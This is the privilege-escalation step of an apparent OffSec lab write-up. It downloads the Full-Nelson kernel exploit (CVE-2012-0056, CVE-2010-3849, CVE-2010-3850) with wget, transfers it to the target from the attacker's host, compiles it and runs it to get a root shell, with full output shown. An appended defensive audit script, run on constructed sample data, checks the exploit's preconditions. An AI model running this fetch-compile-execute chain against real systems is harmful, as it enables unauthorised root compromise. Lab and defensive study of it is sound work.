Full-Nelson


PEAS has identified that the target system is vulnerable to the Full-Nelson exploit, which targets CVE-2012-0056, CVE-2010-3849, and CVE-2010-3850.

CVE-2010-3849: a resource management vulnerability, classified as problematic, in the function econet_sendmsg of Linux Kernel 2.6.16.9. An exploit is available.

CVE-2010-3850: an access control vulnerability, classified as problematic, in the function ec_dev_ioctl of Linux Kernel 2.6.16.9. An exploit is available.

CVE-2012-0056: an access control vulnerability, classified as critical, in the function mem_write of Linux Kernel 2.6.39. An exploit is available.

Exploit


Exploit available online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zenphoto]
└─$ wget http://vulnfactory.org/exploits/full-nelson.c
--2025-03-24 15:20:14--  http://vulnfactory.org/exploits/full-nelson.c
Resolving vulnfactory.org (vulnfactory.org)... 198.54.116.186
Connecting to vulnfactory.org (vulnfactory.org)|198.54.116.186|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9400 (9.2K) [text/plain]
Saving to: ‘full-nelson.c’
 
full-nelson.c          100%[============================>]   9.18K  --.-KB/s    in 0s      
 
2025-03-24 15:20:15 (490 MB/s) - ‘full-nelson.c’ saved [9400/9400]

Downloading the exploit

Exploitation


www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/full-nelson.c

Delivery complete

www-data@offsecsrv:/var/tmp$ gcc full-nelson.c -o full-nelson

Compile

www-data@offsecsrv:/var/tmp$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf82322d0
 [+] Resolved econet_ops to 0xf82323c0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
offsecsrv
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:9e:5f:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
    inet6 fe80::250:56ff:fe9e:5ff6/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise
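
The run above starts by resolving kernel addresses and depends on the econet code named in the CVE descriptions. The following shell audit is an added example, not part of the original write-up, that checks those two preconditions from the defender's side. It assumes the addresses come from a kallsyms-style symbol table and that econet is a loadable module; the function names and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit two preconditions visible in the run above.
# On a real host pass /proc/kallsyms (read as an unprivileged user) and /etc/modprobe.d.

# 0 if any symbol the run resolved is listed with a non-zero address.
symbols_exposed() {   # $1 = kallsyms-style file: "<hex addr> <type> <name> [module]"
    awk '$3 ~ /^(commit_creds|prepare_kernel_cred|econet_ioctl|econet_ops)$/ &&
         $1 !~ /^0+$/ { found = 1 }
         END { exit(found ? 0 : 1) }' "$1"
}

# 0 if a modprobe config file blacklists econet or replaces its load with a no-op.
econet_load_restricted() {   # $1 = directory holding *.conf files
    cat "$1"/*.conf 2>/dev/null | grep -Eq \
      '^[[:space:]]*(blacklist[[:space:]]+econet|install[[:space:]]+econet[[:space:]]+/bin/(false|true))[[:space:]]*$'
}

# Print one line per finding; the return status is the number of findings.
audit() {   # $1 = kallsyms-style file, $2 = modprobe.d directory
    findings=0
    if symbols_exposed "$1"; then
        echo "FINDING: kernel symbol addresses readable (see kernel.kptr_restrict)"
        findings=$((findings + 1))
    fi
    if ! econet_load_restricted "$2"; then
        echo "FINDING: no modprobe rule restricts loading of econet"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Constructed sample data: a host like the one in the run above, then a hardened one.
demo=$(mktemp -d)
mkdir "$demo/weak.d" "$demo/hard.d"
printf '%s\n' 'c016dcc0 T commit_creds' 'c016e000 T prepare_kernel_cred' \
    'f82322d0 t econet_ioctl [econet]' > "$demo/weak.syms"
printf '%s\n' '00000000 T commit_creds' '00000000 T prepare_kernel_cred' > "$demo/hard.syms"
printf '%s\n' '# constructed' 'install econet /bin/false' > "$demo/hard.d/econet.conf"
audit "$demo/weak.syms" "$demo/weak.d" || echo "weak host: $? finding(s)"
audit "$demo/hard.syms" "$demo/hard.d" && echo "hardened host: clean"
```

Patching the kernel remains the actual fix; the two checks only show whether the preconditions seen in this run are still present on a host.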